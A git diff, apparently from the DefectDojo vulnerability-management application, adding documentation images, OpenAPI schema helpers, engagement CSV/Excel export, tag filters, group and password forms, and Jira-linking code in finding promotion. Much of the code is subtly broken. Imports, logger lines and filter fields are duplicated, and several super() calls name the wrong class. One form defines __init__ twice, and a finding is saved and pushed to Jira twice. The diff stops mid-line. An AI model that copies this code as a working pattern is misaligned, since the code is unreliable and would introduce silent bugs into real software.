b/docs/static/images/product_3.png differ diff --git a/docs/static/images/report_1.png b/docs/static/images/report_1.png new file mode 100644 index 00000000000..308e5770afd Binary files /dev/null and b/docs/static/images/report_1.png differ diff --git a/docs/static/images/report_2.png b/docs/static/images/report_2.png new file mode 100644 index 00000000000..44338646f8d Binary files /dev/null and b/docs/static/images/report_2.png differ diff --git a/docs/static/images/reupload_menu1.png b/docs/static/images/reupload_menu1.png new file mode 100644 index 00000000000..97c7eaf10f3 Binary files /dev/null and b/docs/static/images/reupload_menu1.png differ diff --git a/docs/static/images/risk_exception.png b/docs/static/images/risk_exception.png new file mode 100644 index 00000000000..38d4a51b4e6 Binary files /dev/null and b/docs/static/images/risk_exception.png differ diff --git a/docs/static/images/screenshot1.png b/docs/static/images/screenshot1.png new file mode 100644 index 00000000000..8e384f3042c Binary files /dev/null and b/docs/static/images/screenshot1.png differ diff --git a/docs/static/images/sda-se-logo.png b/docs/static/images/sda-se-logo.png new file mode 100644 index 00000000000..a569deda6d8 Binary files /dev/null and b/docs/static/images/sda-se-logo.png differ diff --git a/docs/static/images/select_engagement.png b/docs/static/images/select_engagement.png new file mode 100644 index 00000000000..496282e667c Binary files /dev/null and b/docs/static/images/select_engagement.png differ diff --git a/docs/static/images/signal-iduna.png b/docs/static/images/signal-iduna.png new file mode 100644 index 00000000000..31fa0ef372e Binary files /dev/null and b/docs/static/images/signal-iduna.png differ diff --git a/docs/static/images/similar_finding_1.png b/docs/static/images/similar_finding_1.png new file mode 100644 index 00000000000..a4d61e61139 Binary files /dev/null and b/docs/static/images/similar_finding_1.png differ diff --git a/docs/static/images/similar_finding_2.png b/docs/static/images/similar_finding_2.png new file mode 100644 index 00000000000..b702789cf94 Binary files /dev/null and b/docs/static/images/similar_finding_2.png differ diff --git a/docs/static/images/sla_global_settings.png b/docs/static/images/sla_global_settings.png new file mode 100644 index 00000000000..1c3ded3f6d3 Binary files /dev/null and b/docs/static/images/sla_global_settings.png differ diff --git a/docs/static/images/sla_notification_product_checkboxes.png b/docs/static/images/sla_notification_product_checkboxes.png new file mode 100644 index 00000000000..92f1be217d4 Binary files /dev/null and b/docs/static/images/sla_notification_product_checkboxes.png differ diff --git a/docs/static/images/slack-logo-icon.png b/docs/static/images/slack-logo-icon.png new file mode 100644 index 00000000000..2c8adc74b6b Binary files /dev/null and b/docs/static/images/slack-logo-icon.png differ diff --git a/docs/static/images/slack_rgb.png b/docs/static/images/slack_rgb.png new file mode 100644 index 00000000000..e706be1f9df Binary files /dev/null and b/docs/static/images/slack_rgb.png differ diff --git a/docs/static/images/slack_scopes.png b/docs/static/images/slack_scopes.png new file mode 100644 index 00000000000..1bebe984e40 Binary files /dev/null and b/docs/static/images/slack_scopes.png differ diff --git a/docs/static/images/slack_tokens.png b/docs/static/images/slack_tokens.png new file mode 100644 index 00000000000..65ca8a7132f Binary files /dev/null and b/docs/static/images/slack_tokens.png differ diff --git a/docs/static/images/source-code-repositories_1.png b/docs/static/images/source-code-repositories_1.png new file mode 100644 index 00000000000..2a5cad6439d Binary files /dev/null and b/docs/static/images/source-code-repositories_1.png differ diff --git a/docs/static/images/source-code-repositories_2.png b/docs/static/images/source-code-repositories_2.png new file mode 100644 index 00000000000..27af15a2e1b Binary files /dev/null and b/docs/static/images/source-code-repositories_2.png differ diff --git a/docs/static/images/source-code-repositories_3.png b/docs/static/images/source-code-repositories_3.png new file mode 100644 index 00000000000..d92f519cf0d Binary files /dev/null and b/docs/static/images/source-code-repositories_3.png differ diff --git a/docs/static/images/timo-pagel-logo.png b/docs/static/images/timo-pagel-logo.png new file mode 100644 index 00000000000..91108e65a55 Binary files /dev/null and b/docs/static/images/timo-pagel-logo.png differ diff --git a/docs/static/images/wso2-logo-for-screen.png b/docs/static/images/wso2-logo-for-screen.png new file mode 100644 index 00000000000..6bd138c098a Binary files /dev/null and b/docs/static/images/wso2-logo-for-screen.png differ diff --git a/dojo/api_v2/schema/__init__.py b/dojo/api_v2/schema/__init__.py new file mode 100644 index 00000000000..cd8ea5bb23e --- /dev/null +++ b/dojo/api_v2/schema/__init__.py @@ -0,0 +1,10 @@ +from .extra_schema import IdentitySchema, ExtraParameters, ExtraResponseField, ComposableSchema +from .utils import LazySchemaRef, try_apply, resolve_lazy_ref + +__all__ = ['IdentitySchema', + 'ExtraParameters', + 'ExtraResponseField', + 'ComposableSchema', + 'LazySchemaRef', + 'try_apply', + 'resolve_lazy_ref'] diff --git a/dojo/api_v2/schema/extra_schema.py b/dojo/api_v2/schema/extra_schema.py new file mode 100644 index 00000000000..3dc8e2ba4ac --- /dev/null +++ b/dojo/api_v2/schema/extra_schema.py @@ -0,0 +1,132 @@ +from drf_yasg.inspectors.view import SwaggerAutoSchema +from drf_yasg.openapi import resolve_ref, Schema +from .utils import resolve_lazy_ref +import copy + + +class ComposableSchema: + """A composable schema defines a transformation on drf_yasg Operation. These + schema can then be composed with another composable schema using the composeWith method + yielding a new composable schema whose transformation is defined as the function composition + of the transformation of the two source schema. + """ + def transform_operation(self, operation, resolver): + """Defines an operation transformation + + Args: + operation (Operation): the operation to transform + resolver (Resolver): the schema refs resolver + """ + pass + + def composeWith(self, schema): + """Allow two schema to be composed into a new schema. + Given the caller schema 'self' and another schema 'schema', + this operation yields a new composable schema whose transform_operation + if defined as + transform_operation(op, res) = schema.transform_operation(self.transform_operation(op, res), res) + + Args: + schema (ComposableSchema): The schema to compose with + + Returns: + ComposableSchema: the newly composed schema + """ + op = self.transform_operation + + class _Wrapper(ComposableSchema): + def transform_operation(self, operation, resolver): + return schema.transform_operation(op(operation, resolver), resolver) + + return _Wrapper() + + def to_schema(self): + """Convert the composable schema into a SwaggerAutoSchema that + can be used with the drf_yasg library code + + Returns: + SwaggerAutoSchema: the swagger auto schema derived from the composable schema + """ + op = self.transform_operation + + class _Schema(SwaggerAutoSchema): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + + def get_operation(self, operation_keys): + operation = super().get_operation(operation_keys) + return op(operation, self.components) + + return _Schema + + +class IdentitySchema(ComposableSchema): + def transform_operation(self, operation, resolver): + return operation + + +class ExtraParameters(ComposableSchema): + """Define a schema that can add parameters to the operation + """ + def __init__(self, operation_name, extra_parameters, *args, **kwargs): + """Initialize the schema + + Args: + operation_name (string): the name of the operation to transform + extra_parameters (list[Parameter]): list of openapi parameters to add + """ + super().__init__(*args, **kwargs) + self._extra_parameters = extra_parameters + self._operation_name = operation_name + + def transform_operation(self, operation, resolver): + operation_id = operation["operationId"] + if not operation_id.endswith(self._operation_name): + return operation + + for param in self._extra_parameters: + operation["parameters"].append(resolve_lazy_ref(param, resolver)) + return operation + + +class ExtraResponseField(ComposableSchema): + """Define a schema that can add fields to the responses of the operation + """ + def __init__(self, operation_name, extra_fields, *args, **kwargs): + """Initialize the schema + + Args: + operation_name (string): the name of the operation to transform + extra_fields (dict()): description of the fields to add to the responses. The format is + { + parameters: list[openapi.Parameter](params1, params2, ...), + responses: { + code1: { + field1: openapi.Schema, + field2: openapi.Schema, + ... + }, + code2: ... + } + } + """ + super().__init__(*args, **kwargs) + self._extra_fields = extra_fields + self._operation_name = operation_name + + def transform_operation(self, operation, resolver): + operation_id = operation["operationId"] + if not operation_id.endswith(self._operation_name): + return operation + + responses = operation["responses"] + for code, params in self._extra_fields.items(): + if code in responses: + original_schema = responses[code]["schema"] + schema = original_schema if type(original_schema) is Schema else resolve_ref(original_schema, resolver) + schema = copy.deepcopy(schema) + + for name, param in params.items(): + schema["properties"][name] = resolve_lazy_ref(param, resolver) + responses[code]["schema"] = schema + return operation diff --git a/dojo/api_v2/schema/utils.py b/dojo/api_v2/schema/utils.py new file mode 100644 index 00000000000..a036fa58281 --- /dev/null +++ b/dojo/api_v2/schema/utils.py @@ -0,0 +1,58 @@ +from drf_yasg.openapi import SchemaRef, Schema + + +class LazySchemaRef: + """Utility class to support SchemaRef definition without knowing the resolver. + The reference can be evaluated later in the context of a swagger generator + """ + def __init__(self, schema_name, ignore_unresolved=False): + # Bind curried version of the SchemaRef init + self.schema_ref = lambda resolver: SchemaRef(resolver, schema_name, ignore_unresolved) + + def apply(self, resolver): + """Resolve the LazySchemaRef with the given resolver + + Args: + resolver (ReferenceResolver): resolver containing the schema refs + + Returns: + SchemaRef: the corresponding SchemaRef + """ + return self.schema_ref(resolver) + + +def try_apply(obj, resolver): + """Try to resolve a LazySchemaRef + + Args: + obj (object): the object to resolve + resolver (resolver): the resolver to use + + Returns: + object: the original object if it was not resolve otherwise the resolved LazySchemaRef + """ + if type(obj) is LazySchemaRef: + return obj.apply(resolver) + else: + return obj + + +def resolve_lazy_ref(schema, resolver): + """Recursively evaluate the schema to unbox LazySchemaRef based on the underlying resolvers. + + Args: + schema (object): the schema to evaluate + + Returns: + object: the schema without LazySchemaRef + """ + if type(schema) is not Schema: + return try_apply(schema, resolver) + + if "properties" in schema: + for prop_name, prop in schema["properties"].items(): + schema["properties"][prop_name] = resolve_lazy_ref(prop, resolver) + if "additionalProperties" in schema: + schema["additionalProperties"] = resolve_lazy_ref(schema["additionalProperties"], resolver) + + return schema diff --git a/dojo/celery.py b/dojo/celery.py index ead4a8813a8..1ec50ddb1dd 100644 --- a/dojo/celery.py +++ b/dojo/celery.py @@ -5,6 +5,9 @@ from celery import Celery, Task from celery.signals import setup_logging from django.conf import settings +import logging + +logger = logging.getLogger(__name__) logger = logging.getLogger(__name__) diff --git a/dojo/cred/views.py b/dojo/cred/views.py index be5d0560683..278492e8739 100644 --- a/dojo/cred/views.py +++ b/dojo/cred/views.py @@ -5,6 +5,15 @@ from django.shortcuts import get_object_or_404, render from django.urls import reverse from django.utils import timezone +from dojo.models import Finding, Product, Engagement, Cred_User, Cred_Mapping, Test +from dojo.utils import add_breadcrumb, Product_Tab +from dojo.forms import CredUserForm, NoteForm, CredMappingFormProd, CredMappingForm + +from dojo.utils import dojo_crypto_encrypt, prepare_for_view +from dojo.authorization.authorization_decorators import user_is_authorized +from dojo.authorization.roles_permissions import Permissions +from dojo.authorization.authorization_decorators import user_is_configuration_authorized +from dojo.cred.queries import get_authorized_cred_mappings from dojo.authorization.authorization_decorators import user_is_authorized, user_is_configuration_authorized from dojo.authorization.roles_permissions import Permissions diff --git a/dojo/engagement/views.py b/dojo/engagement/views.py index 9ecdabfdd9b..614485c1b8a 100644 --- a/dojo/engagement/views.py +++ b/dojo/engagement/views.py @@ -1780,3 +1780,134 @@ def excel_export(request): response["Content-Disposition"] = "attachment; filename=engagements.xlsx" logger.debug("done with excel export") return response + + +def get_list_index(list, index): + try: + element = list[index] + except Exception as e: + element = None + return element + + +def get_engagements(request): + url = request.META.get('QUERY_STRING') + if not url: + raise ValidationError('Please use the export button when exporting engagements') + else: + if url.startswith('url='): + url = url[4:] + + path_items = list(filter(None, re.split('/|\?', url))) # noqa W605 + + if not path_items or path_items[0] != 'engagement': + raise ValidationError('URL is not an engagement view') + + view = query = None + if get_list_index(path_items, 1) in ['active', 'all']: + view = get_list_index(path_items, 1) + query = get_list_index(path_items, 2) + else: + view = 'active' + query = get_list_index(path_items, 1) + + request.GET = QueryDict(query) + engagements = get_filtered_engagements(request, view).qs + test_counts = get_test_counts(engagements) + + return engagements, test_counts + + +def get_excludes(): + return ['is_ci_cd', 'jira_issue', 'jira_project', 'objects', 'unaccepted_open_findings'] + + +def get_foreign_keys(): + return ['build_server', 'lead', 'orchestration_engine', 'preset', 'product', + 'report_type', 'requester', 'source_code_management_server'] + + +def csv_export(request): + engagements, test_counts = get_engagements(request) + + response = HttpResponse(content_type='text/csv') + response['Content-Disposition'] = 'attachment; filename=engagements.csv' + + writer = csv.writer(response) + + first_row = True + for engagement in engagements: + if first_row: + fields = [] + for key in dir(engagement): + if key not in get_excludes() and not callable(getattr(engagement, key)) and not key.startswith('_'): + fields.append(key) + fields.append('tests') + + writer.writerow(fields) + + first_row = False + if not first_row: + fields = [] + for key in dir(engagement): + if key not in get_excludes() and not callable(getattr(engagement, key)) and not key.startswith('_'): + value = engagement.__dict__.get(key) + if key in get_foreign_keys() and getattr(engagement, key): + value = str(getattr(engagement, key)) + if value and isinstance(value, str): + value = value.replace('\n', ' NEWLINE ').replace('\r', '') + fields.append(value) + fields.append(test_counts.get(engagement.id, 0)) + + writer.writerow(fields) + + return response + + +def excel_export(request): + engagements, test_counts = get_engagements(request) + + workbook = Workbook() + workbook.iso_dates = True + worksheet = workbook.active + worksheet.title = 'Engagements' + + font_bold = Font(bold=True) + + row_num = 1 + for engagement in engagements: + if row_num == 1: + col_num = 1 + for key in dir(engagement): + if key not in get_excludes() and not callable(getattr(engagement, key)) and not key.startswith('_'): + cell = worksheet.cell(row=row_num, column=col_num, value=key) + cell.font = font_bold + col_num += 1 + cell = worksheet.cell(row=row_num, column=col_num, value='tests') + cell.font = font_bold + row_num = 2 + if row_num > 1: + col_num = 1 + for key in dir(engagement): + if key not in get_excludes() and not callable(getattr(engagement, key)) and not key.startswith('_'): + value = engagement.__dict__.get(key) + if key in get_foreign_keys() and getattr(engagement, key): + value = str(getattr(engagement, key)) + if value and isinstance(value, datetime): + value = value.replace(tzinfo=None) + worksheet.cell(row=row_num, column=col_num, value=value) + col_num += 1 + worksheet.cell(row=row_num, column=col_num, value=test_counts.get(engagement.id, 0)) + row_num += 1 + + with NamedTemporaryFile() as tmp: + workbook.save(tmp.name) + tmp.seek(0) + stream = tmp.read() + + response = HttpResponse( + content=stream, + content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet' + ) + response['Content-Disposition'] = 'attachment; filename=engagements.xlsx' + return response diff --git a/dojo/filters.py b/dojo/filters.py index 4ae5224dab6..efde0f5fb4e 100644 --- a/dojo/filters.py +++ b/dojo/filters.py @@ -1257,6 +1257,12 @@ class ProductEngagementFilterHelper(FilterSet): }, ) + def __init__(self, *args, **kwargs): + super(EngagementFilter, self).__init__(*args, **kwargs) + self.form.fields['prod_type'].queryset = get_authorized_product_types(Permissions.Product_Type_View) + self.form.fields['engagement__lead'].queryset = get_authorized_users(Permissions.Product_Type_View) \ + .filter(engagement__lead__isnull=False).distinct() + class Meta: model = Product fields = ["name"] @@ -2313,6 +2319,43 @@ class Meta: # label='tags', # doesn't work with tagulous, need to set in __init__ below ) + not_tags = ModelMultipleChoiceFilter( + field_name='tags__name', + to_field_name='name', + exclude=True, + queryset=Finding.tags.tag_model.objects.all().order_by('name'), + # label='tags', # doesn't work with tagulous, need to set in __init__ below + ) + + not_test__tags = ModelMultipleChoiceFilter( + field_name='test__tags__name', + to_field_name='name', + exclude=True, + label='Test without tags', + queryset=Test.tags.tag_model.objects.all().order_by('name'), + # label='tags', # doesn't work with tagulous, need to set in __init__ below + ) + + not_test__engagement__tags = ModelMultipleChoiceFilter( + field_name='test__engagement__tags__name', + to_field_name='name', + exclude=True, + label='Engagement without tags', + queryset=Engagement.tags.tag_model.objects.all().order_by('name'), + # label='tags', # doesn't work with tagulous, need to set in __init__ below + ) + + not_test__engagement__product__tags = ModelMultipleChoiceFilter( + field_name='test__engagement__product__tags__name', + to_field_name='name', + exclude=True, + label='Product without tags', + queryset=Product.tags.tag_model.objects.all().order_by('name'), + # label='tags', # doesn't work with tagulous, need to set in __init__ below + ) + + not_tag = CharFilter(field_name='tags__name', lookup_expr='icontains', label='Not tag name contains', exclude=True) + def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.form.fields["cwe"].choices = cwe_options(self.queryset) @@ -2331,6 +2374,55 @@ class ApiTemplateFindingFilter(DojoFilter): not_tags = CharFieldInFilter(field_name="tags__name", lookup_expr="in", help_text="Comma separated list of exact tags not present on model", exclude="True") + tags = ModelMultipleChoiceFilter( + field_name='tags__name', + to_field_name='name', + queryset=Endpoint.tags.tag_model.objects.all().order_by('name'), + # label='tags', # doesn't work with tagulous, need to set in __init__ below + ) + + tag = CharFilter(field_name='tags__name', lookup_expr='icontains', label='Tag name contains') + + tags = ModelMultipleChoiceFilter( + field_name='tags__name', + to_field_name='name', + queryset=Finding.tags.tag_model.objects.all().order_by('name'), + # label='tags', # doesn't work with tagulous, need to set in __init__ below + ) + + test__tags = ModelMultipleChoiceFilter( + field_name='test__tags__name', + to_field_name='name', + queryset=Test.tags.tag_model.objects.all().order_by('name'), + # label='tags', # doesn't work with tagulous, need to set in __init__ below + ) + + test__engagement__tags = ModelMultipleChoiceFilter( + field_name='test__engagement__tags__name', + to_field_name='name', + queryset=Engagement.tags.tag_model.objects.all().order_by('name'), + # label='tags', # doesn't work with tagulous, need to set in __init__ below + ) + + test__engagement__product__tags = ModelMultipleChoiceFilter( + field_name='test__engagement__product__tags__name', + to_field_name='name', + queryset=Product.tags.tag_model.objects.all().order_by('name'), + # label='tags', # doesn't work with tagulous, need to set in __init__ below + ) + + tag = CharFilter(field_name='tags__name', lookup_expr='icontains', label='Tag name contains') + + not_tags = ModelMultipleChoiceFilter( + field_name='tags__name', + to_field_name='name', + exclude=True, + queryset=Finding.tags.tag_model.objects.all().order_by('name'), + # label='tags', # doesn't work with tagulous, need to set in __init__ below + ) + + not_tag = CharFilter(field_name='tags__name', lookup_expr='icontains', label='Not tag name contains', exclude=True) + o = OrderingFilter( # tuple-mapping retains order fields=( diff --git a/dojo/finding/views.py b/dojo/finding/views.py index 999e15e6e47..e8c5c31a7a0 100644 --- a/dojo/finding/views.py +++ b/dojo/finding/views.py @@ -1900,6 +1900,10 @@ def apply_template_to_finding(request, fid, tid): # Update review fields finding.last_reviewed = timezone.now() finding.last_reviewed_by = request.user + finding.tags = form.cleaned_data['tags'] + + finding.cve = None + finding_helper.save_vulnerability_ids(finding, form.cleaned_data['vulnerability_ids'].split()) # Save finding (this will trigger CVSS score computation if vectors are set) finding.save() @@ -2091,6 +2095,48 @@ def promote_to_finding(request, fid): new_finding.save(push_to_jira=push_to_jira) + # Save and add new endpoints + finding_helper.add_endpoints(new_finding, form) + + # Push to jira? + push_to_jira = False + jira_message = None + if jform and jform.is_valid(): + # Push to Jira? + logger.debug('jira form valid') + push_to_jira = push_all_jira_issues or jform.cleaned_data.get('push_to_jira') + + # if the jira issue key was changed, update database + new_jira_issue_key = jform.cleaned_data.get('jira_issue') + if new_finding.has_jira_issue: + jira_issue = new_finding.jira_issue + + # everything in DD around JIRA integration is based on the internal id of the issue in JIRA + # instead of on the public jira issue key. + # I have no idea why, but it means we have to retrieve the issue from JIRA to get the internal JIRA id. + # we can assume the issue exist, which is already checked in the validation of the jform + + if not new_jira_issue_key: + jira_helper.finding_unlink_jira(request, new_finding) + jira_message = 'Link to JIRA issue removed successfully.' + + elif new_jira_issue_key != new_finding.jira_issue.jira_key: + jira_helper.finding_unlink_jira(request, new_finding) + jira_helper.finding_link_jira(request, new_finding, new_jira_issue_key) + jira_message = 'Changed JIRA link successfully.' + else: + logger.debug('finding has no jira issue yet') + if new_jira_issue_key: + logger.debug('finding has no jira issue yet, but jira issue specified in request. trying to link.') + jira_helper.finding_link_jira(request, new_finding, new_jira_issue_key) + jira_message = 'Linked a JIRA issue successfully.' + + finding_helper.save_vulnerability_ids(new_finding, form.cleaned_data['vulnerability_ids'].split()) + + # Save it and push it to JIRA + new_finding.save(push_to_jira=push_to_jira) + + # Delete potential finding finding.delete() if "githubform" in request.POST: gform = GITHUBFindingForm( @@ -2272,6 +2318,7 @@ def add_template(request): if request.method == "POST": form = FindingTemplateForm(request.POST) if form.is_valid(): + apply_message = "" template = form.save(commit=False) template.numerical_severity = Finding.get_numerical_severity( template.severity, diff --git a/dojo/forms.py b/dojo/forms.py index a73abb00ce6..30264230249 100644 --- a/dojo/forms.py +++ b/dojo/forms.py @@ -337,6 +337,12 @@ class Meta: fields = ["id"] +class Delete_Dev_EnvironmentForm(forms.ModelForm): + class Meta: + model = Development_Environment + fields = ['id'] + + class ProductForm(forms.ModelForm): name = forms.CharField(max_length=255, required=True) description = forms.CharField(widget=forms.Textarea(attrs={}), @@ -1715,6 +1721,7 @@ class Meta: class FindingTemplateForm(forms.ModelForm): + apply_to_findings = forms.BooleanField(required=False, help_text="Apply template to all findings that match this CWE. (Update will overwrite mitigation, impact and references for any active, verified findings.)") title = forms.CharField(max_length=1000, required=True) cwe = forms.IntegerField(label="CWE", required=False) @@ -1755,6 +1762,8 @@ class FindingTemplateForm(forms.ModelForm): "fix_available", "fix_version", "planned_remediation_version", "effort_for_fixing", "component_name", "component_version", "references", "notes", "endpoints", "tags"] + field_order = ['title', 'cwe', 'vulnerability_ids', 'severity', 'cvssv3', 'description', 'mitigation', 'impact', 'references', 'tags', 'template_match', 'template_match_cwe', 'template_match_title', 'apply_to_findings'] + def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.fields["tags"].autocomplete_tags = Finding.tags.tag_model.objects.all().order_by("name") @@ -2065,6 +2074,14 @@ def _post_clean(self): except forms.ValidationError as e: self._update_errors(e) + def __init__(self, *args, **kwargs): + queryset = kwargs.pop('missing_note_types') + super(CloseFindingForm, self).__init__(*args, **kwargs) + if len(queryset) == 0: + self.fields['note_type'].widget = forms.HiddenInput() + else: + self.fields['note_type'] = forms.ModelChoiceField(queryset=queryset, label='Note Type', required=True) + class Meta: model = Notes fields = ["note_type", "entry", "mitigated", "mitigated_by", "false_p", "out_of_scope", "duplicate"] @@ -2181,6 +2198,25 @@ def clean(self): raise ValidationError(msg) return cleaned_data + def __init__(self, *args, **kwargs): + finding = None + if 'finding' in kwargs: + finding = kwargs.pop('finding') + + super(ReviewFindingForm, self).__init__(*args, **kwargs) + self.fields['reviewers'].choices = self._get_choices(get_authorized_users(Permissions.Finding_View).filter(is_active=True)) + + if finding is not None: + queryset = get_authorized_users_for_product_and_product_type(None, finding.test.engagement.product, Permissions.Finding_Edit) + self.fields['reviewers'].choices = self._get_choices(queryset) + + @staticmethod + def _get_choices(queryset): + l_choices = [] + for item in queryset: + l_choices.append((item.pk, item.get_full_name())) + return l_choices + class Meta: fields = ["reviewers", "entry", "allow_all_reviewers"] @@ -2432,6 +2468,174 @@ def __init__(self, *args, **kwargs): self.fields["role"].disabled = True +class DojoGroupForm(forms.ModelForm): + + name = forms.CharField(max_length=255, required=True) + description = forms.CharField(widget=forms.Textarea(attrs={}), required=False) + + class Meta: + model = Dojo_Group + fields = ['name', 'description'] + exclude = ['users'] + + +class DeleteGroupForm(forms.ModelForm): + id = forms.IntegerField(required=True, + widget=forms.widgets.HiddenInput()) + + class Meta: + model = Dojo_Group + fields = ['id'] + + +class Add_Group_MemberForm(forms.ModelForm): + users = forms.ModelMultipleChoiceField(queryset=Dojo_Group_Member.objects.none(), required=True, label='Users') + + def __init__(self, *args, **kwargs): + super(Add_Group_MemberForm, self).__init__(*args, **kwargs) + self.fields['group'].disabled = True + current_members = Dojo_Group_Member.objects.filter(group=self.initial['group']).values_list('user', flat=True) + self.fields['users'].queryset = Dojo_User.objects.exclude( + Q(is_superuser=True) | + Q(id__in=current_members)).exclude(is_active=False).order_by('first_name', 'last_name') + self.fields['role'].queryset = get_group_member_roles() + + class Meta: + model = Dojo_Group_Member + fields = ['group', 'users', 'role'] + + +class Add_Group_Member_UserForm(forms.ModelForm): + groups = forms.ModelMultipleChoiceField(queryset=Dojo_Group.objects.none(), required=True, label='Groups') + + def __init__(self, *args, **kwargs): + super(Add_Group_Member_UserForm, self).__init__(*args, **kwargs) + self.fields['user'].disabled = True + current_groups = Dojo_Group_Member.objects.filter(user=self.initial['user']).values_list('group', flat=True) + self.fields['groups'].queryset = Dojo_Group.objects.exclude(id__in=current_groups) + self.fields['role'].queryset = get_group_member_roles() + + class Meta: + model = Dojo_Group_Member + fields = ['groups', 'user', 'role'] + + +class Edit_Group_MemberForm(forms.ModelForm): + def __init__(self, *args, **kwargs): + super(Edit_Group_MemberForm, self).__init__(*args, **kwargs) + self.fields['group'].disabled = True + self.fields['user'].disabled = True + self.fields['role'].queryset = get_group_member_roles() + + class Meta: + model = Dojo_Group_Member + fields = ['group', 'user', 'role'] + + +class Delete_Group_MemberForm(Edit_Group_MemberForm): + def __init__(self, *args, **kwargs): + super(Delete_Group_MemberForm, self).__init__(*args, **kwargs) + self.fields['role'].disabled = True + + +class Add_Product_GroupForm(forms.ModelForm): + groups = forms.ModelMultipleChoiceField(queryset=Dojo_Group.objects.none(), required=True, label='Groups') + + def __init__(self, *args, **kwargs): + super(Add_Product_GroupForm, self).__init__(*args, **kwargs) + self.fields['product'].disabled = True + current_groups = Product_Group.objects.filter(product=self.initial["product"]).values_list('group', flat=True) + authorized_groups = get_authorized_groups(Permissions.Group_View) + authorized_groups = authorized_groups.exclude(id__in=current_groups) + self.fields['groups'].queryset = authorized_groups + + class Meta: + model = Product_Group + fields = ['product', 'groups', 'role'] + + +class Add_Product_Group_GroupForm(forms.ModelForm): + products = forms.ModelMultipleChoiceField(queryset=Product.objects.none(), required=True, label='Products') + + def __init__(self, *args, **kwargs): + super(Add_Product_Group_GroupForm, self).__init__(*args, **kwargs) + current_members = Product_Group.objects.filter(group=self.initial["group"]).values_list('product', flat=True) + self.fields['products'].queryset = get_authorized_products(Permissions.Product_Member_Add_Owner) \ + .exclude(id__in=current_members) + self.fields['group'].disabled = True + + class Meta: + model = Product_Group + fields = ['products', 'group', 'role'] + + +class Edit_Product_Group_Form(forms.ModelForm): + + def __init__(self, *args, **kwargs): + super(Edit_Product_Group_Form, self).__init__(*args, **kwargs) + self.fields['product'].disabled = True + self.fields['group'].disabled = True + + class Meta: + model = Product_Group + fields = ['product', 'group', 'role'] + + +class Delete_Product_GroupForm(Edit_Product_Group_Form): + def __init__(self, *args, **kwargs): + super(Delete_Product_GroupForm, self).__init__(*args, **kwargs) + self.fields['role'].disabled = True + + +class Add_Product_Type_GroupForm(forms.ModelForm): + groups = forms.ModelMultipleChoiceField(queryset=Dojo_Group.objects.none(), required=True, label='Groups') + + def __init__(self, *args, **kwargs): + super(Add_Product_Type_GroupForm, self).__init__(*args, **kwargs) + current_groups = Product_Type_Group.objects.filter(product_type=self.initial["product_type"]).values_list('group', flat=True) + authorized_groups = get_authorized_groups(Permissions.Group_View) + authorized_groups = authorized_groups.exclude(id__in=current_groups) + self.fields['groups'].queryset = authorized_groups + self.fields['product_type'].disabled = True + + class Meta: + model = Product_Type_Group + fields = ['product_type', 'groups', 'role'] + + +class Add_Product_Type_Group_GroupForm(forms.ModelForm): + product_types = forms.ModelMultipleChoiceField(queryset=Product_Type.objects.none(), required=True, label='Product Types') + + def __init__(self, *args, **kwargs): + super(Add_Product_Type_Group_GroupForm, self).__init__(*args, **kwargs) + current_members = Product_Type_Group.objects.filter(group=self.initial['group']).values_list('product_type', flat=True) + self.fields['product_types'].queryset = get_authorized_product_types(Permissions.Product_Type_Member_Add_Owner) \ + .exclude(id__in=current_members) + self.fields['group'].disabled = True + + class Meta: + model = Product_Type_Group + fields = ['product_types', 'group', 'role'] + + +class Edit_Product_Type_Group_Form(forms.ModelForm): + + def __init__(self, *args, **kwargs): + super(Edit_Product_Type_Group_Form, self).__init__(*args, **kwargs) + self.fields['product_type'].disabled = True + self.fields['group'].disabled = True + + class Meta: + model = Product_Type_Group + fields = ['product_type', 'group', 'role'] + + +class Delete_Product_Type_GroupForm(Edit_Product_Type_Group_Form): + def __init__(self, *args, **kwargs): + super(Delete_Product_Type_GroupForm, self).__init__(*args, **kwargs) + self.fields['role'].disabled = True + + class DojoUserForm(forms.ModelForm): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) @@ -2485,6 +2689,40 @@ def clean(self): return cleaned_data +class ChangePasswordForm(forms.Form): + current_password = forms.CharField(widget=forms.PasswordInput, + required=True) + new_password = forms.CharField(widget=forms.PasswordInput, + required=True, validators=[validate_password], + help_text='Password must contain at least 9 characters, one lowercase (a-z) and one uppercase (A-Z) letter, one number (0-9), \ + and one symbol (()[]{}|\`~!@#$%^&*_-+=;:\'\",<>./?).') # noqa W605 + confirm_password = forms.CharField(widget=forms.PasswordInput, + required=True, validators=[validate_password], + help_text='Password must match the new password entered above, following the same password rules.') + + def __init__(self, *args, **kwargs): + self.user = None + if 'user' in kwargs: + self.user = kwargs.pop('user') + super(ChangePasswordForm, self).__init__(*args, **kwargs) + + def clean(self): + cleaned_data = super().clean() + + current_password = self.cleaned_data.get('current_password') + new_password = self.cleaned_data.get('new_password') + confirm_password = self.cleaned_data.get('confirm_password') + + if not self.user.check_password(current_password): + raise forms.ValidationError('Current password is incorrect.') + if new_password == current_password: + raise forms.ValidationError('New password must be different from current password.') + if new_password != confirm_password: + raise forms.ValidationError('Passwords do not match.') + + return cleaned_data + + class AddDojoUserForm(forms.ModelForm): email = forms.EmailField(required=True) password = forms.CharField(widget=forms.PasswordInput, @@ -2624,6 +2862,10 @@ def __init__(self, *args, **kwargs): tags_available_to_user = Product.tags.tag_model.objects.filter(product__in=prods) self.fields["product_tag"].queryset = tags_available_to_user + def __init__(self, *args, **kwargs): + super(ProductTypeCountsForm, self).__init__(*args, **kwargs) + self.fields['product_type'].queryset = get_authorized_product_types(Permissions.Product_Type_View) + class APIKeyForm(forms.ModelForm): id = forms.IntegerField(required=True, @@ -2728,6 +2970,11 @@ class ExpressGITHUBForm(forms.ModelForm): password = forms.CharField(widget=forms.PasswordInput, required=True) issue_key = forms.CharField(required=True, help_text="A valid issue ID is required to gather the necessary information.") + def __init__(self, *args, **kwargs): + super(JIRAForm, self).__init__(*args, **kwargs) + if self.instance: + self.fields['password'].required = False + class Meta: model = GITHUB_Conf exclude = ["product", "epic_name_id", "open_status_key", @@ -2868,6 +3115,23 @@ class Meta: fields = ["id"] +class DeleteProduct_API_Scan_ConfigurationForm(forms.ModelForm): + id = forms.IntegerField(required=True, widget=forms.widgets.HiddenInput()) + + class Meta: + model = Product_API_Scan_Configuration + fields = ['id'] + + +class DeleteJIRAInstanceForm(forms.ModelForm): + id = 